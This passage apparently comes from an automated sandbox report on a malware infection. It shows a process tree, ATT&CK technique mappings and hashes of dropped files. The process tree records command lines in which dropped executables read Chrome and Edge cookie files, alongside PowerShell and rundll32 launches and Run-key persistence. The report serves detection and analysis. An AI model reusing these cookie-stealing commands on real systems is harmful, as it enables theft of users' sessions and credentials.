                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                                              7⤵
                                                                              • Drops file in Program Files directory
                                                                              PID:5324
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                                              7⤵
                                                                              • Drops file in Program Files directory
                                                                              PID:4244
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:5308
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:4388
                                                                                • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                  7⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:4088
                                                                              • C:\Users\Admin\Documents\fcfA0q4UNDnXdWqybUnqi1fS.exe
                                                                                "C:\Users\Admin\Documents\fcfA0q4UNDnXdWqybUnqi1fS.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Drops file in Program Files directory
                                                                                PID:2032
                                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4408
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5128
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4708
                                                                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4320
                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    8⤵
                                                                                      PID:4196
                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:6060
                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2356
                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5132
                                                                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks whether UAC is enabled
                                                                                    • Drops file in Program Files directory
                                                                                    PID:3128
                                                                                • C:\Users\Admin\Documents\VX5ZrW3DqjKZGqAA9VB0RJz5.exe
                                                                                  "C:\Users\Admin\Documents\VX5ZrW3DqjKZGqAA9VB0RJz5.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4228
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                              4⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:4028
                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_6.exe
                                                                                sonia_6.exe
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3724
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2664
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3556
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                              4⤵
                                                                                PID:760
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 544
                                                                                4⤵
                                                                                • Program crash
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:620
                                                                        • \??\c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                          1⤵
                                                                          • Suspicious use of SetThreadContext
                                                                          • Modifies registry class
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4084
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                            2⤵
                                                                            • Checks processor information in registry
                                                                            • Modifies data under HKEY_USERS
                                                                            • Modifies registry class
                                                                            PID:4212
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                            2⤵
                                                                            • Drops file in System32 directory
                                                                            • Checks processor information in registry
                                                                            • Modifies data under HKEY_USERS
                                                                            • Modifies registry class
                                                                            PID:4820
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                          1⤵
                                                                          • Loads dropped DLL
                                                                          • Modifies registry class
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4104
                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:1808
                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          PID:5220
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                            2⤵
                                                                            • Loads dropped DLL
                                                                            • Modifies registry class
                                                                            PID:5248
                                                                        • C:\Users\Admin\AppData\Local\Temp\C12.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\C12.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          PID:5440
                                                                        • \??\c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                          1⤵
                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                          PID:5916
                                                                        • C:\Users\Admin\AppData\Local\Temp\390E.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\390E.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Checks BIOS information in registry
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:4196
                                                                        • C:\Windows\system32\backgroundTaskHost.exe
                                                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          PID:4404
                                                                        • \??\c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                          1⤵
                                                                            PID:4524
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                            1⤵
                                                                              PID:2512

                                                                            Network

                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                            Persistence

                                                                            Modify Existing Service

                                                                            1
                                                                            T1031

                                                                            Registry Run Keys / Startup Folder

                                                                            1
                                                                            T1060

                                                                            BITS Jobs

                                                                            1
                                                                            T1197

                                                                            Defense Evasion

                                                                            Modify Registry

                                                                            3
                                                                            T1112

                                                                            Disabling Security Tools

                                                                            1
                                                                            T1089

                                                                            Virtualization/Sandbox Evasion

                                                                            1
                                                                            T1497

                                                                            BITS Jobs

                                                                            1
                                                                            T1197

                                                                            Install Root Certificate

                                                                            1
                                                                            T1130

                                                                            Credential Access

                                                                            Credentials in Files

                                                                            3
                                                                            T1081

                                                                            Discovery

                                                                            Query Registry

                                                                            6
                                                                            T1012

                                                                            Virtualization/Sandbox Evasion

                                                                            1
                                                                            T1497

                                                                            System Information Discovery

                                                                            6
                                                                            T1082

                                                                            Security Software Discovery

                                                                            1
                                                                            T1063

                                                                            Peripheral Device Discovery

                                                                            1
                                                                            T1120

                                                                            Collection

                                                                            Data from Local System

                                                                            3
                                                                            T1005

                                                                            Command and Control

                                                                            Web Service

                                                                            1
                                                                            T1102

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                              MD5

                                                                              ed841d4c457ead52231fd3a2ccf235eb

                                                                              SHA1

                                                                              3c3e63ebce85e0ad02116131fa358f15bd685aaa

                                                                              SHA256

                                                                              1b71a0b2da18c33c8067989139712715013e134c0df6fd9d9a99944d665a182d

                                                                              SHA512

                                                                              da144b6500c3fa6e3becb02b9507424e28b4514c410ccc65c2bf2fde457076edef5de8130832d06e3d985bbbdb7ac132df8bf6aced68d9c5fc1ca27868f3fcc1

                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                              MD5

                                                                              9be84148228d38d8a7aa04aa003ae49a

                                                                              SHA1

                                                                              83e6cafe58a6ad820ef295825f0d403e55710aae

                                                                              SHA256

                                                                              eae2eb93230894f646f45cec38cc20b03f5075e8b5b6c6639dc487c35e7ad573

                                                                              SHA512

                                                                              eb85383b426ec5cd211fafceaf24d438c8a0d6ac43be2cf9802748de505ada0b4d008548a08834dcc86b4c1b0e3fa5c1a4762e54ab5f6e55ea900e535bc4b578

                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                              MD5

                                                                              d9246a83c00e3449a8904145123f3c32

                                                                              SHA1

                                                                              2d6e3e18db030090e492b2024ea38f197435bff0

                                                                              SHA256

                                                                              ed1c1c5f2496178051a6b00044d2278fd77d306c8fa58a2aba7b4c001940c49b

                                                                              SHA512

                                                                              bd57fde4497d91a37b540bbff3e04f44adf2bb58464650aacd1020827d815666f89edf5b0f2435b1e284e4bd9fc651fa877e256189ea3f776ba74d8c2c8d373d

                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                              MD5

                                                                              6d621aad3caadd5669b39cb7f253861f

                                                                              SHA1

                                                                              64dbd52a4abea349ffc127196969b888507e30da

                                                                              SHA256

                                                                              7ecc86eda2a3a24fc557e10252fd1cac036bdecb43660632d2602696d738a2b7

                                                                              SHA512

                                                                              aa6c1450b1d4fa3150a4e43d1accb4f5a395a24d8daa7b072527017be84d697528fc378bc2535eadb250cc1e7f8ef74c561101ea8a2c8de8fece7c1875fbaf66

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\libcurl.dll
                                                                              MD5

                                                                              d09be1f47fd6b827c81a4812b4f7296f

                                                                              SHA1

                                                                              028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                              SHA256

                                                                              0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                              SHA512

                                                                              857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\libcurlpp.dll
                                                                              MD5

                                                                              e6e578373c2e416289a8da55f1dc5e8e

                                                                              SHA1

                                                                              b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                              SHA256

                                                                              43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                              SHA512

                                                                              9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\libgcc_s_dw2-1.dll
                                                                              MD5

                                                                              9aec524b616618b0d3d00b27b6f51da1

                                                                              SHA1

                                                                              64264300801a353db324d11738ffed876550e1d3

                                                                              SHA256

                                                                              59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                              SHA512

                                                                              0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\libstdc++-6.dll
                                                                              MD5

                                                                              5e279950775baae5fea04d2cc4526bcc

                                                                              SHA1

                                                                              8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                              SHA256

                                                                              97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                              SHA512

                                                                              666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\libwinpthread-1.dll
                                                                              MD5

                                                                              1e0d62c34ff2e649ebc5c372065732ee

                                                                              SHA1

                                                                              fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                              SHA256

                                                                              509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                              SHA512

                                                                              3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\setup_install.exe
                                                                              MD5

                                                                              a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                              SHA1

                                                                              e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                              SHA256

                                                                              0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                              SHA512

                                                                              c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\setup_install.exe
                                                                              MD5

                                                                              a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                              SHA1

                                                                              e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                              SHA256

                                                                              0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                              SHA512

                                                                              c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_1.exe
                                                                              MD5

                                                                              6e43430011784cff369ea5a5ae4b000f

                                                                              SHA1

                                                                              5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                              SHA256

                                                                              a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                              SHA512

                                                                              33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_1.exe
                                                                              MD5

                                                                              6e43430011784cff369ea5a5ae4b000f

                                                                              SHA1

                                                                              5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                              SHA256

                                                                              a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                              SHA512

                                                                              33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_1.txt
                                                                              MD5

                                                                              6e43430011784cff369ea5a5ae4b000f

                                                                              SHA1

                                                                              5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                              SHA256

                                                                              a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                              SHA512

                                                                              33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_2.exe
                                                                              MD5

                                                                              18ffdaa7a2c9906db10ffc13f7c73d23

                                                                              SHA1

                                                                              f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                              SHA256

                                                                              365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                              SHA512

                                                                              db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_2.txt
                                                                              MD5

                                                                              18ffdaa7a2c9906db10ffc13f7c73d23

                                                                              SHA1

                                                                              f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                              SHA256

                                                                              365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                              SHA512

                                                                              db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_3.exe
                                                                              MD5

                                                                              ee658be7ea7269085f4004d68960e547

                                                                              SHA1

                                                                              979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                              SHA256

                                                                              d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                              SHA512

                                                                              fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_3.txt
                                                                              MD5

                                                                              ee658be7ea7269085f4004d68960e547

                                                                              SHA1

                                                                              979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                              SHA256

                                                                              d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                              SHA512

                                                                              fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_4.exe
                                                                              MD5

                                                                              6765fe4e4be8c4daf3763706a58f42d0

                                                                              SHA1

                                                                              cebb504bfc3097a95d40016f01123b275c97d58c

                                                                              SHA256

                                                                              755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                              SHA512

                                                                              c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_4.txt
                                                                              MD5

                                                                              6765fe4e4be8c4daf3763706a58f42d0

                                                                              SHA1

                                                                              cebb504bfc3097a95d40016f01123b275c97d58c

                                                                              SHA256

                                                                              755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                              SHA512

                                                                              c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_5.exe
                                                                              MD5

                                                                              0c3f670f496ffcf516fe77d2a161a6ee

                                                                              SHA1

                                                                              0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                              SHA256

                                                                              8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                              SHA512

                                                                              bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_5.txt
                                                                              MD5

                                                                              0c3f670f496ffcf516fe77d2a161a6ee

                                                                              SHA1

                                                                              0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                              SHA256

                                                                              8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                              SHA512

                                                                              bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_6.exe
                                                                              MD5

                                                                              2eb68e495e4eb18c86a443b2754bbab2

                                                                              SHA1

                                                                              82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                              SHA256

                                                                              a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                              SHA512

                                                                              f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_6.txt
                                                                              MD5

                                                                              2eb68e495e4eb18c86a443b2754bbab2

                                                                              SHA1

                                                                              82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                              SHA256

                                                                              a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                              SHA512

                                                                              f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                            • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                              MD5

                                                                              99ab358c6f267b09d7a596548654a6ba

                                                                              SHA1

                                                                              d5a643074b69be2281a168983e3f6bef7322f676

                                                                              SHA256

                                                                              586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                              SHA512

                                                                              952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                            • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                              MD5

                                                                              1c7be730bdc4833afb7117d48c3fd513

                                                                              SHA1

                                                                              dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                              SHA256

                                                                              8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                              SHA512

                                                                              7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                            • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              MD5

                                                                              b7161c0845a64ff6d7345b67ff97f3b0

                                                                              SHA1

                                                                              d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                              SHA256

                                                                              fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                              SHA512

                                                                              98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              MD5

                                                                              7fee8223d6e4f82d6cd115a28f0b6d58

                                                                              SHA1

                                                                              1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                              SHA256

                                                                              a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                              SHA512

                                                                              3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              MD5

                                                                              7fee8223d6e4f82d6cd115a28f0b6d58

                                                                              SHA1

                                                                              1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                              SHA256

                                                                              a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                              SHA512

                                                                              3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                              MD5

                                                                              74231678f536a19b3016840f56b845c7

                                                                              SHA1

                                                                              a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                              SHA256

                                                                              cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                              SHA512

                                                                              4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                              MD5

                                                                              74231678f536a19b3016840f56b845c7

                                                                              SHA1

                                                                              a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                              SHA256

                                                                              cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                              SHA512

                                                                              4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                            • C:\Users\Admin\Documents\9mIKw1MOYLeuqK2tK4exUrkt.exe
                                                                              MD5

                                                                              b77f22120b841e4c06555fc941e15009

                                                                              SHA1

                                                                              f6cb5b43c329034805346fa2a537845c3052fffd

                                                                              SHA256

                                                                              37ff0fd3316478deaf867a4af9f9694676935a08c32ee04d4607dc967fc47b62

                                                                              SHA512

                                                                              969fe6ff120aad505a784a519fffcc5c1f12b386b46525668c9fa9efd5f5de11f3a7ec555aace7e7a8ae81b2a3ab5148db9c76ff87836aab663810659c07e9ec

                                                                            • C:\Users\Admin\Documents\9mIKw1MOYLeuqK2tK4exUrkt.exe
                                                                              MD5

                                                                              b77f22120b841e4c06555fc941e15009

                                                                              SHA1

                                                                              f6cb5b43c329034805346fa2a537845c3052fffd

                                                                              SHA256

                                                                              37ff0fd3316478deaf867a4af9f9694676935a08c32ee04d4607dc967fc47b62

                                                                              SHA512

                                                                              969fe6ff120aad505a784a519fffcc5c1f12b386b46525668c9fa9efd5f5de11f3a7ec555aace7e7a8ae81b2a3ab5148db9c76ff87836aab663810659c07e9ec

